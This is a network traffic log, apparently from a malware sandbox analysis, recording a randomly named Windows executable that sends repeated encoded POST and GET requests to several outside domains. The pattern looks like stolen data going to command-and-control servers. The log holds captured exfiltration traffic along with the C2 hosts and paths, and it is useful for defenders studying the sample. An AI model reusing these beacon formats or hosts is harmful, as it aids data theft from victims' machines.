Nov 18, 2024 03:23:32.945506096 CET	10918	OUT	POST /hxmz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.futurevision.life Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Origin: http://www.futurevision.life Referer: http://www.futurevision.life/hxmz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 79 4c 65 47 79 58 6d 6a 34 73 51 42 6a 45 4a 54 49 6f 33 2f 52 32 71 47 68 32 76 6a 65 47 65 42 76 49 4e 69 63 4d 66 47 44 66 32 64 51 70 4c 39 72 2b 35 53 69 65 78 43 6f 67 58 6b 4b 50 64 51 77 46 37 4f 56 2f 53 59 54 64 6d 53 42 4d 76 61 43 76 51 56 34 76 6e 76 72 39 62 74 54 42 67 61 34 6f 61 65 39 37 65 2b 66 66 76 76 52 32 51 42 74 51 44 57 55 51 4a 57 55 6a 79 53 43 78 54 7a 4c 37 70 6b 4b 49 77 66 31 6d 64 44 68 77 6b 51 55 55 6a 34 49 6f 41 71 67 6d 58 56 54 62 31 4f 58 4b 5a 42 48 55 45 73 6a 33 73 2b 4f 47 35 32 31 71 4d 7a 62 58 71 5a 33 43 57 63 42 48 49 6b 75 6e 73 6e 66 6e 62 5a 78 52 6a 4f 59 67 68 6d 6d 31 52 5a 39 77 38 6b 6f 52 6d 45 4e 51 59 77 68 45 74 43 55 30 30 45 64 77 30 34 48 47 35 72 39 42 66 4e 37 74 4e 73 38 66 38 6a 67 59 6e 32 30 6f 50 37 34 4e 6c 78 39 77 4c 47 41 35 45 65 30 44 59 46 4d 79 52 38 6c 57 7a 57 58 2f 6a 47 55 6d [TRUNCATED] Data Ascii: XRWLl=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/yLeGyXmj4sQBjEJTIo3/R2qGh2vjeGeBvINicMfGDf2dQpL9r+5SiexCogXkKPdQwF7OV/SYTdmSBMvaCvQV4vnvr9btTBga4oae97e+ffvvR2QBtQDWUQJWUjySCxTzL7pkKIwf1mdDhwkQUUj4IoAqgmXVTb1OXKZBHUEsj3s+OG521qMzbXqZ3CWcBHIkunsnfnbZxRjOYghmm1RZ9w8koRmENQYwhEtCU00Edw04HG5r9BfN7tNs8f8jgYn20oP74Nlx9wLGA5Ee0DYFMyR8lWzWX/jGUmLHEiJnOq1XO0Lm5IMfIGlJiHWXBuMNEty6S8KUOXVqOtR0cWBXMkQNVHRelIf4gqO83fhO6q7m+2YuMqI/QpmziHqHosEICZZUiP6Q+fiPvAcCEQ/hDHWxopKz3Re6qCUNBZFEQ74Ybtu6grRgWEeiUT7OTqTSKpXXjDrQPxOjv0zVhhD4pI3YoModpcnGyBtjBDOQ7mw+26Rlt0bqiBh0Yus195lhYtNuzQf6SKXwVU0rpDjlMLibBgqW7AvlKhOxv8gRdjuSPgmS7rK1AP9hVxTzRCBIDpP5nC5ye1ScHnOBGDQkOQVC85y1dM/OTHRndJ54PlAz4f4sPLmSM1YGvoW9wxz9lQVdwGYk8UgKqX98E9FOLSLsJHud5AU7FLtrYRPQaF7+C7p2ep10F9nNiZnZMHQ1JnjmWqYaedDbcw+UFBfL1woxWJcyugq4ePnLxEEo5jxXeWlY8jOTAavWG/c0VJOxLT3lOjuqH6OonhPDTRHachL96tFA5IgEskVlky+nXMwtnr5oA7IQEaQ9KwyT2USUHulevX79EFzQ1UFzZSDwZnNcohC/PJO+CUW2yKYe3mY5pgZEJOP5kiYbKbEyJji3h9sh72dHv7HbGlCM2U0O5kkPaMEFh/OrNG1urDCn4I/E+l3RADQzmOVqtgyjqQH5UD4Z [TRUNCATED]
Nov 18, 2024 03:23:33.669365883 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 02:23:33 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49951	203.161.49.193	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:35.489334106 CET	536	OUT	GET /hxmz/?p2J=sbJxX&XRWLl=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.futurevision.life Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 18, 2024 03:23:36.203958035 CET	548	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 02:23:36 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49982	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:41.513530016 CET	822	OUT	POST /slxp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.schedulemassage.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Origin: http://www.schedulemassage.xyz Referer: http://www.schedulemassage.xyz/slxp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 67 49 50 2b 59 57 57 6b 71 55 59 61 48 4f 42 5a 33 2b 32 69 6d 51 56 2f 41 4c 35 6d 68 39 36 6f 6e 69 69 34 71 78 52 54 42 36 6f 41 50 56 4b 4b 54 6d 46 69 61 2b 59 4d 53 6c 75 52 35 43 45 63 4e 4e 6d 52 75 4a 5a 46 33 74 6f 4b 6e 61 69 49 77 58 36 71 7a 72 65 59 44 6e 73 4e 72 6d 49 45 62 6d 2b 51 4d 57 65 36 53 5a 6e 5a 6c 35 42 41 62 61 42 71 4a 54 7a 64 31 6e 68 51 6a 65 5a 4f 69 79 55 59 32 61 76 35 4d 2f 38 47 59 79 33 66 6a 35 76 70 57 30 43 37 49 6a 54 56 43 64 39 59 79 78 4a 37 4e 38 49 65 7a 4f 31 2b 64 75 30 36 41 55 4a 4a 67 67 3d 3d Data Ascii: XRWLl=dp+M27OzYBUBgIP+YWWkqUYaHOBZ3+2imQV/AL5mh96onii4qxRTB6oAPVKKTmFia+YMSluR5CEcNNmRuJZF3toKnaiIwX6qzreYDnsNrmIEbm+QMWe6SZnZl5BAbaBqJTzd1nhQjeZOiyUY2av5M/8GYy3fj5vpW0C7IjTVCd9YyxJ7N8IezO1+du06AUJJgg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49996	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:44.058895111 CET	842	OUT	POST /slxp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.schedulemassage.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Origin: http://www.schedulemassage.xyz Referer: http://www.schedulemassage.xyz/slxp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 65 6f 6e 47 75 34 34 45 74 54 41 36 6f 41 58 46 4c 41 58 6d 46 31 61 2b 55 69 53 68 6d 52 35 43 41 63 4e 4a 69 52 75 36 78 47 74 64 6f 49 75 36 69 4f 39 33 36 71 7a 72 65 59 44 6a 45 72 72 6d 51 45 62 32 75 51 4e 30 6d 35 4e 70 6e 65 69 35 42 41 52 36 42 75 4a 54 7a 6a 31 69 34 59 6a 63 68 4f 69 33 77 59 32 4c 76 2b 44 2f 39 4e 63 79 32 30 6b 34 53 51 53 55 6a 4e 48 42 2f 4f 42 59 5a 4f 7a 33 45 68 63 4e 70 4a 68 4f 52 4e 41 70 39 4f 4e 58 30 41 37 6f 43 31 62 38 53 36 75 34 75 36 71 4f 68 62 4d 77 38 35 2f 4e 6b 3d Data Ascii: XRWLl=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhveonGu44EtTA6oAXFLAXmF1a+UiShmR5CAcNJiRu6xGtdoIu6iO936qzreYDjErrmQEb2uQN0m5Npnei5BAR6BuJTzj1i4YjchOi3wY2Lv+D/9Ncy20k4SQSUjNHB/OBYZOz3EhcNpJhORNAp9ONX0A7oC1b8S6u4u6qOhbMw85/Nk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50007	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:47.040193081 CET	10924	OUT	POST /slxp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.schedulemassage.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Origin: http://www.schedulemassage.xyz Referer: http://www.schedulemassage.xyz/slxp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 57 6f 6e 7a 79 34 70 58 46 54 44 36 6f 41 4a 56 4c 44 58 6d 45 33 61 2b 4d 75 53 68 69 72 35 45 63 63 4d 71 71 52 6f 4c 78 47 6a 74 6f 49 73 36 69 50 77 58 36 46 7a 72 4f 55 44 6e 67 72 72 6d 51 45 62 77 53 51 62 57 65 35 65 35 6e 5a 6c 35 42 63 62 61 42 47 4a 54 37 73 31 6a 4d 49 69 73 42 4f 6a 58 41 59 77 35 58 2b 63 50 39 50 62 79 32 73 6b 34 65 78 53 58 48 37 48 46 2f 77 42 65 6c 4f 78 52 35 4b 44 2f 6c 77 2b 73 46 75 56 2b 6b 6b 4b 6c 38 61 69 50 61 49 66 73 33 76 78 5a 4b 78 75 70 46 56 57 43 67 62 67 4d 30 69 47 78 56 44 53 6b 77 61 37 54 6b 34 4f 66 57 31 73 46 4d 50 69 34 50 6f 72 66 37 4d 41 4e 36 62 67 44 4b 4d 67 52 5a 57 70 37 73 66 6b 33 55 71 42 57 58 46 69 75 31 41 70 68 73 37 45 51 6d 2b 52 4a 7a 72 67 67 76 45 78 4d 32 36 2f 41 67 6d 64 50 32 6b 48 75 6e 44 68 74 78 66 6f 59 57 30 47 2f 63 67 33 42 66 6c 69 47 30 7a 74 37 64 47 58 48 65 41 [TRUNCATED] Data Ascii: XRWLl=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhvWonzy4pXFTD6oAJVLDXmE3a+MuShir5EccMqqRoLxGjtoIs6iPwX6FzrOUDngrrmQEbwSQbWe5e5nZl5BcbaBGJT7s1jMIisBOjXAYw5X+cP9Pby2sk4exSXH7HF/wBelOxR5KD/lw+sFuV+kkKl8aiPaIfs3vxZKxupFVWCgbgM0iGxVDSkwa7Tk4OfW1sFMPi4Porf7MAN6bgDKMgRZWp7sfk3UqBWXFiu1Aphs7EQm+RJzrggvExM26/AgmdP2kHunDhtxfoYW0G/cg3BfliG0zt7dGXHeACcTOvzpfGgY8pRVGavZvf8C2sD3Dl9oXwfO6daqRVmZsi3SUtQV80cc9Wwhv2xu9+xLEGDJFk2RbQQPr67nI3PdY/4Q/jIe1K7g8ZBMmWY4FwU5akpaKHDvlkVLlsd+uPVqTb+odppOAObFki7feBqDBXzUozWTu7KW9wMrliT7f6CTPRj6x2H7YaQ8vqDOhYclbbdFJVkXRTjwzj2U78Jq67Rb/3mFFlr60aQUPqw1pi3IfULb0TxdLJwxGxZED2vCj2Zvc0ETPO9KGPmJHdZLnBXK+KWW2iuXT1Tj44GkwmZCnS7k3ikSRSqA/Ms+jPH9BrTMTfGaChp6N5VOaCY+nCKYDvkNeY4AmeFOznQ0PPI4s2CgCBD3Y8/iGHxuhrzecCefeRW7eBgFtLlX6dQBOXJ04eIUfJS80ybppS6NXv0iyScCLZ+X3R5FO8z6rIuKS5kb0UMOYxOl6YM3pKxJ/9oiUCw/if/Yu/w36EGd1/hClIc5SmhJrIo5IZCSsS38xfulo2mbctqSvIMzIqE7mt+WJV/KI8vCeBbumyFIFah39fly1EpGtGzGjXBoMAdnHMfD92jFDuKxtq5/tAuEECmmSc3De4Pl5B+4m7hftXIut/PsBXMVxxqHHb2d8q4+BwgCiJCpfwnf6CMIJZZZGXZhcStQ3tb [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50014	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:49.584367990 CET	538	OUT	GET /slxp/?XRWLl=QrWs1MGbYyQFoq3udSaW2R0wE8dP0+vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs/0Bo4314wmW6buSFT8Qs1kQOmXTHHnWTO0=&p2J=sbJxX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.schedulemassage.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 18, 2024 03:23:50.233027935 CET	391	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 18 Nov 2024 02:23:50 GMT Content-Type: text/html Content-Length: 251 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 52 57 4c 6c 3d 51 72 57 73 31 4d 47 62 59 79 51 46 6f 71 33 75 64 53 61 57 32 52 30 77 45 38 64 50 30 2b 76 61 77 54 5a 65 65 49 31 69 38 74 6d 38 6b 78 65 4e 34 6d 52 61 49 5a 51 71 44 6d 53 72 65 31 41 7a 4e 39 73 49 65 47 2b 50 78 51 34 31 45 4c 2b 58 71 6f 6c 4f 73 2f 30 42 6f 34 33 31 34 77 6d 57 36 62 75 53 46 54 38 51 73 31 6b 51 4f 6d 58 54 48 48 6e 57 54 4f 30 3d 26 70 32 4a 3d 73 62 4a 78 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?XRWLl=QrWs1MGbYyQFoq3udSaW2R0wE8dP0+vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs/0Bo4314wmW6buSFT8Qs1kQOmXTHHnWTO0=&p2J=sbJxX"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50015	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:55.335947990 CET	804	OUT	POST /0598/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mcfunding.org Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Origin: http://www.mcfunding.org Referer: http://www.mcfunding.org/0598/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 4a 61 35 5a 30 6f 6d 6e 72 43 53 4a 78 65 5a 58 72 43 49 4e 65 6b 76 44 6a 6b 56 6e 35 4c 58 73 4b 58 4f 61 49 54 63 58 44 71 76 66 6a 4a 71 42 71 6e 7a 37 59 4a 4d 65 69 32 41 30 72 53 6f 72 65 46 2f 75 48 62 49 66 64 66 76 69 42 33 4f 54 50 64 64 71 78 31 2f 4a 6b 32 76 5a 46 64 6a 33 6a 67 76 37 45 74 33 52 6d 30 77 71 48 79 77 56 57 6b 70 6a 64 6c 48 42 57 51 72 41 52 51 52 69 77 2f 38 33 4b 6e 78 37 42 32 6e 48 72 34 62 38 31 30 67 76 6f 49 71 6d 6d 2b 4f 69 61 45 62 57 43 43 77 46 39 30 4d 79 79 6a 77 63 59 52 39 79 34 59 63 43 67 3d 3d Data Ascii: XRWLl=g4UhOENgM8To+Ja5Z0omnrCSJxeZXrCINekvDjkVn5LXsKXOaITcXDqvfjJqBqnz7YJMei2A0rSoreF/uHbIfdfviB3OTPddqx1/Jk2vZFdj3jgv7Et3Rm0wqHywVWkpjdlHBWQrARQRiw/83Knx7B2nHr4b810gvoIqmm+OiaEbWCCwF90MyyjwcYR9y4YcCg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50016	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:57.876209974 CET	824	OUT	POST /0598/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mcfunding.org Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Origin: http://www.mcfunding.org Referer: http://www.mcfunding.org/0598/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 2f 58 69 49 2f 4f 62 4b 37 63 51 44 71 76 51 44 4a 7a 46 71 6d 65 37 5a 30 6d 65 6a 61 41 30 72 47 6f 72 63 74 2f 70 30 44 4c 5a 4e 66 74 76 68 33 49 51 2f 64 64 71 78 31 2f 4a 67 66 79 5a 46 56 6a 33 54 51 76 35 6c 74 30 63 47 30 33 70 48 79 77 43 47 6b 74 6a 64 6c 78 42 54 78 41 41 54 6f 52 69 78 76 38 33 62 6e 32 77 42 32 68 44 72 34 4c 78 58 6b 77 76 59 49 69 67 41 36 68 6e 49 41 55 58 45 50 71 55 4d 56 62 67 79 48 44 42 66 59 4a 2f 37 6c 56 5a 6e 43 71 4c 71 7a 58 62 75 66 6f 53 58 41 6b 58 44 30 42 2b 67 77 3d Data Ascii: XRWLl=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkK/XiI/ObK7cQDqvQDJzFqme7Z0mejaA0rGorct/p0DLZNftvh3IQ/ddqx1/JgfyZFVj3TQv5lt0cG03pHywCGktjdlxBTxAAToRixv83bn2wB2hDr4LxXkwvYIigA6hnIAUXEPqUMVbgyHDBfYJ/7lVZnCqLqzXbufoSXAkXD0B+gw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50017	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:24:00.415040016 CET	10906	OUT	POST /0598/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mcfunding.org Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Origin: http://www.mcfunding.org Referer: http://www.mcfunding.org/0598/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 6e 58 69 35 66 4f 61 72 37 63 52 44 71 76 5a 6a 4a 32 46 71 6d 6d 37 59 63 69 65 6a 47 51 30 70 2b 6f 71 2f 56 2f 6f 46 44 4c 58 4e 66 74 7a 52 33 4a 54 50 64 4d 71 78 6c 7a 4a 6b 44 79 5a 46 56 6a 33 56 55 76 33 6b 74 30 65 47 30 77 71 48 79 73 56 57 6c 34 6a 64 64 68 42 54 38 37 41 69 49 52 69 51 66 38 34 4a 50 32 79 68 32 6a 4f 4c 35 55 78 58 70 33 76 59 46 5a 67 41 6d 4c 6e 4b 63 55 58 43 2b 4a 4b 63 56 30 78 43 62 53 5a 73 4d 43 2f 35 41 55 53 56 69 30 4c 61 66 50 49 76 37 44 56 30 39 2b 4c 57 59 69 67 6c 31 57 43 49 69 41 52 42 76 65 68 59 75 5a 48 7a 57 49 53 6a 6a 32 76 71 74 44 39 69 78 57 49 55 32 34 69 74 55 32 4c 6d 36 6b 31 74 41 73 71 6f 61 7a 4d 55 5a 74 56 6f 75 34 76 46 65 42 72 77 47 74 6f 54 45 33 73 78 42 64 75 64 45 73 39 79 66 41 50 48 79 6d 42 35 52 55 6e 64 48 42 48 4f 69 35 2f 50 47 4c 72 58 6b 62 67 2b 75 49 56 6c 6e 52 45 6a 6e 55 [TRUNCATED] Data Ascii: 